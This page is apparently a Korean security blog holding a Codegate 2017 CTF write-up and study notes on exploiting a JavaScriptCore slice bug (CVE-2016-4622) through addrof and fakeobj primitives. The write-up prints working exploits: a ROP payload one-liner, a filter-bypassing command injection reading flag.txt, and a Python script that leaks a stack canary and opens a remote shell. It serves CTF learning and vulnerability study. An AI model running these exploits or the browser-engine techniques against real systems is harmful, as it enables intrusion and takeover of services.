codegate 2017

크리에이티브 커먼즈 라이선스
Creative Commons License

https://github.com/ctfs/write-ups-2017/tree/master/codegate-prequals-2017/pwn



meow

분석이 어려워보이지만 어려워보이는코드는 다 분석할필요가 없는 코드들입니다

그냥 md5 평문만 찾아내서 gdb로 0x12000이랑 0x14000코드를 보면 되는데

0x12000에서는 write(); read(0, rbp+0x8, 0x18) 을 하는데 처음에는 rbp-0x8로 봐서 아 리턴까지만 딱 덮게 해주네 라고 생각했는데 rbp+0x8이라서 이상함을 느꼈습니다

그래서 14000을 보니 execve가 있고 그 뒤에 /bin/sh랑 pop rdi;ret 이 있어서 그거 이용해서 풀면됩니다


(perl -e 'print "\$W337k!++y\n", "3\n", "\x36\x40\x01\x00\x00\x00\x00\x00", "\x29\x40\x01\x00\x00\x00\x00\x00", "\x00\x40\x01\x00\x00\x00\x00\x00"';cat)|./meow




babyMISC


첫스텝은 base64 encoded string은 다르지만 같은 decoded value를 만듭니다

바이너리에 비교대상 base64는 있으니 그걸 decode해서 뒤에 \x00 하나 붙여주면 길이는 같지만 다른 base64 문자열이 나옵니다

두번째스텝은 두개의 base64 decode string이 같지만 encoded string은 달라야 합니다 cd80, cd80\x00\x00\x00 으로 각각 넣어줍니다

세번째스텝은 filter문제인데 쉘에서 base64 -d  로 하면 널바이트를 무시해주기 때문에 \x00cat flag.txt\x00 한걸 넣었습니다


 ⚡ root@cd80  ~/tmp  ./BabyMISC 

[*] Ok, Let's Start. Input the write string on each stage!:)

[*] -- STAGE 01 ----------

[+] KEY : 


[+] Input > 

TjBfbTRuX2M0bDFfYWc0aW5fWTNzdDNyZDR5OigA

[*] USER : N0_m4n_c4l1_ag4in_Y3st3rd4y:(

[+] -- NEXT STAGE! ----------

[*] -- STAGE 02 ----------

[+] Input 1 

Y2Q4MAAA

[+] Input 2 

Y2Q4MAAAAA==

[+] -- NEXT STAGE! ----------

[*] -- STAGE 03 ----------

[+] Ok, It's easy task to you, isn't it? :)

[+] So I will give a chance to execute one command! :)

[*] Input > 

AGNhdCBmbGFnLnR4dAA=

#                                                       echo -n AGNhdCBmbGFnLnR4dAA= | base64 -d | sh

y0u_pwned_y0ur_b4by

 ⚡ root@cd80  ~/tmp  


babypwn


system함수가 바이너리안에 박혀있어서 카나리만 우회하면되는데 카나리는 A 41개 보내면 저한테 알려줍니다 넣고 /bin/sh만 recv하게 해서 실행합니다


from socket import *

from struct import pack,unpack

p = lambda x : pack("<L", x)

up = lambda x : unpack("<L", x)[0]



## get canary ##

s = socket()

s.connect((gethostbyname("cd80.sexy"), 8181))

print s.recv(4096)

s.send("1\n")

print s.recv(4096)

s.send("A"*41)

print s.recv(4096)

ret = s.recv(4096)

canary = ret.split("\n===============================")[0].split("A"*41)[1]

canary = up('\x00'+canary)

print "canary: 0x%08x"%canary

s.close()


cmd = "/bin/sh 0<&4 1>&4 2>&4\x00"


## exploit ##

s = socket()

s.connect((gethostbyname("cd80.sexy"), 8181))

print s.recv(4096)

s.send("1\n")

print s.recv(4096)

payload = "A"*40

payload += p(canary)

payload += "A"*12


payload += p(0x80486e0) # recv@plt

payload += p(0x8048eec) # ppppr

payload += p(4)

payload += p(0x804b1b4) # bss

payload += p(len(cmd))

payload += p(0)


payload += p(0x8048620) # system

payload += p(0x41414141)

payload += p(0x804b1b4) # bss


s.send(payload)

print s.recv(4096)

s.send("3\n")

print s.recv(4096)

s.send(cmd)

while True:

    tmp = raw_input("$ ")

    if not len(tmp):

        continue

    else:

        s.send(tmp + "\n")

    print s.recv(4096)

s.close()


신고

'해킹공부 > 캡쳐더플래그' 카테고리의 다른 글

codegate 2017  (0) 2017.02.22
HITCON 2015 matrix  (0) 2015.10.23
WhiteHat Contest 2015 cd80  (6) 2015.10.12
LeaveRet JFF Season3 pwnable vaja  (1) 2015.07.26
Codegate2015 junior writeup  (5) 2015.03.16
pCTF 2013 pork  (3) 2014.08.18

설정

트랙백

댓글

Attacking Javascript Engines - Building Exploit Primitives

크리에이티브 커먼즈 라이선스
Creative Commons License

이제 저는 취약점이 발생하는 이유를 알고 디버깅 하는 법을 압니다

오늘 정리할 챕터는 챕터 4이고, 이름은 Building exploit primitives입니다.

제목을 보면 취약점을 공격하기 위해 필요한 몇가지를 만드는 방법에 대한 챕터입니다


지금까지 대회 문제를 풀면서 익스를 할땐, 코드 상 취약점, 각 보호기법들을 우회할 수 있는 취약점들을 이용해서, GOT를 릭해 프로그램에서 사용하지 않는 라이브러리 함수를 실행시켜 쉘을 획득했습니다

아직은 각각이 왜 필요하게 되었는지는 알 수 없지만 이 문서에서는 익스플로잇을 위해 메모리릭과 페이크객체가 필요하다고 하고, 각각을 addrof, fakeobj라고 줄여 부른다고 약속합니다


Prerequisites: Int64

지금까지 알아본 바로는 제목에 나와있듯이 Int64라는 형을 어떻게 표현해야 할지 궁금합니다

왜냐면 Int형을 저장할 땐 FFFF 태그를 붙이고 그 외에 48비트로는 Int64형이라고 할 수 없기 때문이죠

8바이트를 풀로 사용하는 데이터형은 지금까지는 Float형밖에 없었습니다

하지만 이 문서에서 [17]로 링크한 ECMA 표준을보면 표준상으로는 모든 숫자가 float이라고 합니다. 하지만 실제로 구현된 JS 엔진들은 성능상의 문제로 32비트 int형을 별도로 만들어 사용한다고 하고, 필요할 때 이를 float형으로 바꿔 사용한다고합니다(32비트 안에서 표현이 불가능할때)

자바스크립트 데이터 타입은 원래 64비트 정수의 표현이 불가능하기 때문에, JSC에서는 이를 위해 별도의 모듈을 구현해 사용한다고 합니다. 그것이 Int64라고 불리구요(이 설명은 맞지 않습니다 fakeobj를 할때 알았는데 int64는 문서를 쓴사람이 임의로 만든것 같습니다 https://github.com/saelo/jscpwn/  여기서 받아서 쓰면되고, 실행은 ./jsc utils.js Int64.js fakeobj.js로 하면됩니다)


Int64는 제가 보기에는 Object의 형태로 사용이 되는것으로 보이고 아래와 같은 특징을 가집니다

  • (String, Number, Byte) -> Int64로의 형변환이 가능합니다
  • Int64의 덧셈과 뺄셈이 가능하고 assignXXX 메소드를 이용한다는데 assignAdd와 assignSub입니다
  • Add와 Sub의 함수의 리턴값으로 새로운 오브젝트를 만들 수 있다고 합니다

아 여기까지 보면은 Int64 인스턴스를 만들어서

Int64 my_var = Int64("123948120830"), 즉 String을 이용한 초기화가 가능하고

my_var.assignXXX(123123) // 이렇게 사용된다는 거 같네요

그리고

Int64 new_var = Add(my_var, 123) // 이런식으로 사용된다는게 지금까지 세개 특징의 의미입니다


그리고 마지막 특징으로는 Double과 Int64간의 형변환이 가능하다는것을 들었습니다

이거는 뭐 원래 double이 64비트를 풀로 이용하니 어려울 게 없는 특징입니다

변환하는 방법은 Int64("12341234").asDouble() 입니다




addrof and fakeobj

이 두가지 요소 모두 JSC가 double 배열을 저장할 때 NaN-Boxing 표현방식에 구애받지 않는다는점을 이용한다고 합니다

double은 사실 0001-fffe, 즉 태그가 0이나 ffff가 아닌 모든 것이기 때문에 규칙이 있다고 보기는 어렵죠. 그런 말을 하는 것 같습니다

즉, 우리가 double 배열을 사용하면은 결국 JSValue(Nan-Boxed value)를 사용하는 것과 똑같아서 편해진다 이런 말을 하는것 같습니다


그다음에 메모리릭을 하는 방법에 대해 설명을 하는데

[메모리릭]

1. double 배열을 생성한다. 내부적으로는 ArrayWithDouble이라는 타입을 가진 array가 생성이 된다

2. The Bug 섹션에서 했던대로 valueOf를 이용해서 아래와 같은 오브젝트를 생성한다

2-1. 1에서 만든 배열을 shrink시킨다(shrink시킬때 threshold보다 높게 하면 reallocate되는 것 다시 기억)

2-2. 우리가 주소를 알고자 하는 객체만 포함하고 있는 배열을 생성한다. 이 배열은 2-1에서 reallocate된 배열의 바로 뒤에 위치할 것이다(왜냐하면 butterfly들이 저장된 copied space들은 할당이 선형으로 이뤄지기 때문에, 섹션 3 힙에서 언급되는 내용입니다)

2-3. valueOf에서 return할때 어레이의 새 사이즈(The Bug에서는 a.length=0, return 10; 했음)보다 큰 값을 리턴한다

3. slice를 2에서 만든 오브젝트를 인자로해서 호출하라는데 그냥 a.slice({valueOf:~~}); 하란 뜻이다


이렇게 보고 쓰고 나니까 이제 메모리릭이 어떻게 이뤄지는지 알겠습니다 제일 중요한것은 butterfly들은 copied space에 저장된단 내용인데, 섹션 3에서 한번 중요하다고 언급을 이미 한 내용입니다. 섹션3은 그냥 휙휙 읽으면 되는 섹션이기때문에 따로 블로그에 정리하진 않았습니다


우선은 위에 있는 스텝대로 그대로 해봤습니다





그다음에 값을 보고 메모리를 검사해본 화면입니다

 


보면은 b에 들어가있는 0xcd80cd80, 즉 b가 갖고있는 값 자체가 실제로 출력이 됐고

array 타입 자체가 float형이기 때문에 number가 float형으로 저장된 것 같습니다

그러면 한번 array의 주소도 출력이 되는지 확인 해보겠습니다


오옹홍~

메모리상에서는 출력이 됐고


print()에서도 아주 잘 출력이 돼있었습니다

이걸로 봤을 때 우리가 릭한 값은 slice의 결과 값의 인덱스 3번에 있습니다(0부터 셌을 때

그래서 문서에서 함수로 구현해둔것을 보면


이렇게 array를 만들고 a.slice로 리턴된것의 3번째 인덱스를 리턴하고 있습니다


===================================================


자 그러면 이제 addrof는 완벽하게 이해를 했습니다

addrof를 이해하기위해 가장 중요한것은 섹션 2. The Bug에서 얘기했던 shrink와 allocate,

그리고 섹션 3에서 얘기한 copied space에 butterfly들이 할당된단점과 butterfly들은 선형으로 할당된단점

이렇게 총 네가지만 제대로 이해하고 있으면 되는 것 같습니다



다음으로 fakeobj를 봅시다

fakeobj는 반대로 JSObject포인터를 직접 만드는 거라고 합니다

문서에서 설명한 순서를 먼저 보면


1. 오브젝트들의 배열을 생성함(0000태그, 아마도?), 이 어레이는 ArrayWithContiguous라는 타입을 갖는 배열임

2. 마찬가지로 valueOf를 이용해서 아래와 같은 오브젝트를 만듬

2-1. reallocate를 위한 shrinking

2-2. double 배열을 생성하는데, 우리가 조작하고자하는 JSObject의 비트 패턴과 일치하도록 만든다고 하는데 이건 무슨 뜻일까?

2-3. a.slice로 리턴되는 배열의 length를 조작하기 위해 return 0이상


사실 addrof는 이렇게 쓰고나서 바로 이해를 하고 디버깅으로 확인만해봤는데

fakeobj는 썼는데 무슨뜻인지 하나도 모르겠습니다

디버깅을 해서 이해해보도록 하겠습니다


테스트코드는 프랙문서에 있는 fakeobj() 함수에 디버깅 브포를 위한 print만 붙였습니다



우선 맨처음 print(a)에서 메모리를 보면

예상한대로 나옵니다



아 근데 여기서 더 해봤는데 크래쉬가 자꾸나서 일단 오늘은 여기까지

fakeobj는 지금까지 이해한 바로는, 오브젝트의 배열을 만들고, 그 배열에 우리가 원하는 아무 주소나 써서(문서 작성자의 익스에서는 특정 배열+16의 주소) 그 주소를 오브젝트로써 접근해서 arbitrary write가 가능하게 하는 걸로 보임

그래서 addrof = arbitrary read

fakeobj = arbitrary write

addrof + fakeobj = pwn!



신고

설정

트랙백

댓글

Attacking Javascript Engines - The Bug

크리에이티브 커먼즈 라이선스
Creative Commons License

오늘은 문서의 2장인 버그 자체에 대한 설명을 정리합니다



The Bug

우선 이 버그는 ECMA 표준에 정의 돼있는 Array.prototype.slice(start, end) 메소드의 JavaScriptCore 구현체에서 발생합니다.

JavaScriptCore에서는 Source/JavaScriptCore/runtime/ArrayPrototype.cpp 에 arrayProtoFuncSlice 라는 이름으로 구현돼있습니다


Array.prototype.slice는 php의 substring, python의 "asdf"[a:b] 등과 같이 배열이나 문자열을 slice하는 메소드 입니다


먼저 slice메소드를 사용하는 예시를 문서에 나온 그대로 보겠습니다

a.slice는

첫번째인자 <= N < 두번째 인자인 N번째 요소들의 집합을 만듭니다

그래서 1,3 으로 했을때

a[1], a[2] 두개인 [2,3]이라는 array가 만들어집니다




이 slice의 구현체를 봅시다

slice의 구현체는 

/root/browny/WebKit/320b1fc/webkit/Source/JavaScriptCore/runtime/ArrayPrototype.cpp

여기에 arrayProtoFuncSlice 라는 이름의 함수로 있습니다


아래는 문서에서 정리한 소스코드입니다

    // 1. Obtain the reference object for the method call
    JSObject* thisObj = exec->thisValue().toThis(exec, StrictMode).toObject(exec);
    if (!thisObj)
        return JSValue::encode(JSValue());


    // 2. Retrive the length of the array
    unsigned length = getLength(exec, thisObj);
    if (exec->hadException())
        return JSValue::encode(jsUndefined());

    // 3. Convert the arguments (start and end index) into native integer types and clamp them to the range [0, length)
    unsigned begin = argumentClampedIndexFromStartOrEnd(exec, 0, length);
    unsigned end = argumentClampedIndexFromStartOrEnd(exec, 1, length, length);

    // 4. Check if a species constructor should be used
    std::pair<SpeciesConstructResult, JSObject*> speciesResult = speciesConstructArray(exec, thisObj, end - begin);
    // We can only get an exception if we call some user function.
    if (UNLIKELY(speciesResult.first == SpeciesConstructResult::Exception))
        return JSValue::encode(jsUndefined());

    // 5. Perform the slicing
    if (LIKELY(speciesResult.first == SpeciesConstructResult::FastPath && isJSArray(thisObj))) {
        if (JSArray* result = asArray(thisObj)->fastSlice(*exec, begin, end - begin))
            return JSValue::encode(result);
    }

1. this를 구합니다. 즉 a.slice에서 a를 구합니다

2. 배열의 길이를 구합니다

3. begin에는 0번째인자, end에는 2번째 인자를 넣습니다. argumentClampedIndexFromStartOrEnd는 a.slice(-2, 4)나 a.slice(1, 5) 등에 대해서도 정상 작동하게 구현돼있습니다

4. species라는건 상속관계를 뜻하는것 같습니다. 어레이의 요소들이 바꼈을 때 새로 생성자를 호출해야되는지를 체크하는거 같기도 하네요 잘 모르겠습니다

5. fast slice를 호출합니다 ( 이 취약점은 fast slice 에서만 발생합니다 )


fast slice에서만 취약점이 발생한 이유는 문서에서 설명하고 있는데

slow slice에서는 요소를 가져올 때 오브젝트에 getProperty를 호출하고 hadExecption을 체크하는데 여기서 바운드 체크를 한다고 합니다



argumentClampedIndexFromStartOrEnd 함수는 이름이 참 긴데

두번째인자 (위의 slice코드에서 begin은 0, end는 1로 설정된 그 값)으로 인자를 가져오고

그 값을 toInteger해서 native 자료형으로 변경합니다


함수 분석을 모두 적기는 제가 힘들어서 대충 쓰면

toInteger에서 toNumber를 호출합니다

toNumber에서는 toPrimitive와, toPrimitive에서 리턴된 오브젝트에서 toNumber를 호출합니다

toPrimitive에서는  callToPrimitiveFunction<TypeHintMode::TakesHint>(exec, this, exec->propertyNames().toPrimitiveSymbol, preferredType); 를 호출합니다


callToPrimitiveFunction에서는 오브젝트의 toPrimitive함수를 호출합니다

primitive라는 용어는 https://developer.mozilla.org/en/docs/Glossary/Primitive 여기에 잘 설명 돼있습니다



이런식으로 인자가 number뿐만 아니라 String, Boolean, Symbol 등 다른 primitive의 경우에도 가능하다면 숫자로 변환시켜줍니다

유연한 형변환을 위한 구현인 것 같습니다

예를 들어서 서버에서 정수를 받아와서 인자에 바로 넣었는데 이런 유연한 형변환을 지원하지 않는다면 

func(a, b); 라고 하면 될것을

func(int(a), int(b)); 와 같이 쓰게 됩니다

이런 편의성을 지원하기 위해 만들어진 개념 같습니다


근데 이런 기능들이 특정 primitive에만 한정돼서 유연하다면 결국 number만 허용하는것과 다를게 없겠죠

https://developer.mozilla.org/ko/docs/Web/JavaScript/Reference/Global_Objects/Object/valueOf

이 문서에서는 valueOf라는 메소드를 이용해 값을 조작하는데,

위 링크에 잘 설명이 돼있습니다

한번 따라해보면


이렇게 값을 참조할때 코드를 실행시키게 할 수 있습니다

CVE-2016-4622는 바로 이런 기능을 이용해서 공격하는 취약점입니다



이렇게 간단하게도 사용이 가능합니다


문서에 나와있는걸 똑같이 해보면


이렇게 앞의 0.123, 1.123을 제외하면 원래 있던 값이 사라졌습니다

아무리 length를 0으로 설정했어도 slice에서 10을 리턴했기 때문에

똑같이 a가 있던곳에서 10개만큼을 출력해 줄텐데

뒤에 값이 사라진 이유는 array의 length를 0으로 설정하면 실제 메모리상에서도 줄이면서  realloc을 하기 때문입니다


이게 첫길이와 그다음길이가 64이상 차이가 나야하는데, 그이유는 문서에 쉽게 설명돼있습니다

64바이트 이상 차이가 나지 않으면 배열을 재할당하는것보다 배열 요소를 모두 지우고 그냥 쓰는게 낫다고 합니다



그런데 0.123, 1.123은 왜 남아있고 그뒤에부터 삭제돼있는지 알아봅시다

그걸 알아보기 위해선 a라는 변수가 어떻게 변했는지를 알아야겠죠

그래서 a.slice를 하기전과 후에 print(a)를 넣고, print함수의 구현체에 breakpoint를 걸어 확인해봅시다




섹션 5.2 디버깅 예제

우선 더 쉬운 예제가 섹션 5.2에 있습니다

이 문서 쓰신분이 디버깅 방법에 대해서는 좀 대충대충 넘어가셔갖고 혼자 삽질하면서 깨우친것들인데

우선 디버깅하기 제일 쉬운방법은 JavaScriptCore/jsc.cpp 에 있는 functionPrint 함수에다가 exec->argument(0); 을 %p로 찍는 코드를 집어넣고

lldb나 gdb에서 functionPrint에 브레이크포인트를 건다음

실행하다가 브포가 걸리면 fini로 함수를 실행시킵니다

그러면 인자의 주소가 나오는데 그걸 x/16gx로 보시면됩니다(거의 모든 데이터형이 8바이트기 때문에 g로 봅니다)



우선 jsc.cpp의 functionPrint에 디버깅코드 추가




디버깅 대상 오브젝트고, 저는 print함수에 브포를 걸어서 확인할꺼기 때문에

섹션 5.2에서는 선언만했지만 저는 print도 넣었습니다


gdb로 jsc열고 functionPrint에 브레이크포인트 걸음


실행하고 브포걸린 상태에서 fini로 함수를 실행하면

exec->argument(0), 즉 obj의 주소가 나옴



보면은 일단 첫 8바이트는 JSCell이라고 합니다 뭔지는 일단 저도 스킵하고

두번째가 Butterfly 포인터라고 합니다

근데 null로 설정 돼 있는 이유는 문서에서 설명하기로는 모든 프로퍼티들이 인라인으로 저장돼서라는데 먼소린진 모르겠다

근데 그다음 값들은 태그를 이해하고 있으면 이제 잘보인다

0xffff000000001337 == Integer 0x1337

0x0000000000000006 == Pointer ( False )

0x402bbd70a3d70a3d == 태그가 1~0xfffe니까 double,

0x00007fffb1fcfee0 == 태그가 pointer니까 포인터


double

여기서 유일하게 해석이 어려웠던게 double 이였는데

0x402bbd70a3d70a3d 가 double인건 알겠는데 

https://gregstoll.dyndns.org/~gregstoll/floattohex/ 여기서 converting하면 13.37이 아니라 13.87로 나옵니다

그래서 왜그런가 하다가 floating point 태그가 0x0001 부터 시작하니까 0x0001000000000000을 빼주면 되지 않을까 싶어서 빼니까 13.37이 잘 나왔습니다

그러니까

0x402bbd70a3d70a3d 으로 돼있으면

0x402abd70a3d70a3d 로 값을 읽어야합니다

// 아니 근데 빼야 제대로된 값이 나올때가 있고 안빼야 나올때가 있는데 대체 어떨때 빼야되는거지



array

float은 그렇고 우리는 지금 array를 보고 있기 때문에

0x7fffb1fcfee0을 봅시다

보면은 위에서 obj 자체를 봤을때는 butterfly pointer가 null이였는데 여기서는 값이 설정 돼있습니다

그 이유를 생각해보면 butterfly는 포인터 왼쪽에 property, 오른쪽에 elements를 가지는 구조인데

배열은 element의 나열이 필요하기 때문에 butterfly pointer가 설정돼있는 것 같습니다

그래서 확인해보면


array에 있었던 Integer형의 1,2,3,4가 들어있습니다

그럼 이제 우리는 array를 보는 방법도 압니다




문서에 나와있는 예제 코드 분석

그러면 이제 드디어 왜 0.123, 1.123은 남아있고 그다음은 이상한값, 그리고 그 뒤에는 0으로 채워져있었는지 확인해봅시다


먼저 디버깅을 위해 print를 추가한 코드입니다

첫 print에서 array의 주소를 확인하고

두번째 print에서 array의 주소를 다시 확인해봅니다



첫 print에서 본 배열입니다

배열 element들의 시작은 0x7fffb33e4148부터입니다



그다음 slice를 하면서 valueOf에서 length를 0으로 바꿔버렸고

그게 JSArray::setLength에서 정한 threshold보다 차이가 높기 때문에 reallocate가 발생해 배열의 시작주소가 0x7fffb33e4148 에서 0x7fffb33e4740으로 바꼈습니다

값들을 좀 살펴보면


이렇게 돼있고, 이 값은 print(b)에서 나오는 값과 똑같습니다

근데 여기에는 두번나오고 b에서는 한번나온다는점이 다른데, 그 다음 b는 어떻게 돼있나 보죠


우선은 아까 엄청 위에서 했었을때와 같은 값들이 출력이 됐구요

0.123, 1.123 이 있고 그다음 2.121995~~ 가 이제 무슨값이였는지 알게 됐습니다

이렇게 앞에 두개가 남아있는 이유는 아직은 알지 못하겠고

오늘은 여기까지만하고 내일 reallocateAndShrinkButterfly함수를 분석해봐야 알 것 같습니다

그냥 쉽게 생각할 수 있는건 slice의 첫 인자는 0으로 고정돼있으니까 0.123은 무조건 들어갈 거라고 예상할 수 있고, 1.123도 뭐 바로 다음이니까 들어갈 수 있긴 할텐데

정확한 코드 흐름을 내일 더 분석해봐야 알 것 같습니다


오늘은 여기까지

신고

설정

트랙백

댓글

1 2 3 4 5 ... 28

티스토리 툴바